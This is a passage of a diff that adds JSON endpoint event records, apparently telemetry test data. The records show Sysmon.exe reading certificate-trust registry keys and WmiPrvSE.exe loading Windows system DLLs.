"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wmitomi.dll", + "image_path": "C:\\Windows\\System32\\wmitomi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792460000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "mi.dll", + "image_path": "C:\\Windows\\System32\\mi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792460000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "miutils.dll", + "image_path": "C:\\Windows\\System32\\miutils.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792460000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "NetAdapterCim.dll", + "image_path": "C:\\Windows\\System32\\wbem\\NetAdapterCim.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573792460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "devobj.dll", + "image_path": "C:\\Windows\\System32\\devobj.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "NetSetupApi.dll", + "image_path": "C:\\Windows\\System32\\NetSetupApi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573793230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 